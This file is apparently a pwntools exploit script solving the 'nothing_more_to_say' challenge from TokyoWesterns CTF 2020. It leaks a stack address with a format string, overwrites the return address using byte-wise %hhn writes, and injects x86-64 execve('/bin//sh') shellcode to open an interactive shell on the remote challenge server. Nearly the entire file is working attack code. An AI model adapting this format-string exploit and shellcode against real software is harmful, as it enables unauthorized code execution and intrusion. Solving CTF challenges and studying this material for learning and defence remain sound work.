2020-09-19-tokyowesterns/nothing_more_to_say/exploit.py

#this was just ordinary format string attack

from pwn import *
import re


r = remote("pwn02.chal.ctf.westerns.tokyo", 18247)


print (r.recvuntil("> "))
r.send("%p")
d = r.recvuntil("> ")

stack = re.findall(r'(0x[0-9a-f]+)',str(d))[0]
print (stack)

#gdb.attach("nothing",gdbscript="b *0x00000000004007c3\nc")
#input(".")

ret = int(stack,16) + 264

print (f"ret = {ret:x}")

#ret = 0x1111111111111111

payloadend = b""
for i in range(0,8):
	payloadend+=p64(ret+i)


buf = ret-264
	
sofar=0
write=buf+1
payload = b""


#%x$hhn are put at the beginning of the payload, addresses are pu in the end of payload, "a" is between.
for i in range(0,8):
	w = write & 0xFF
	write = write // 0x100
	if w>sofar:
		p = w - sofar
		if p<8:
			p=p+0x100
	else:
		p = w + 0x100 - sofar
	payload += str.encode(("%"+str(p)+"x"+"%"+str(30+i)+"$hhn"))
	sofar+=p
	sofar%=0x100

payload=payload+str.encode("a"*(0x100-len(payload)-len(payloadend)))+payloadend

	
print (len(payload))	
r.write(payload)
d = r.recvuntil("> ")

print ("---")
print (d)

shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
r.write("q"+shellcode)
r.interactive()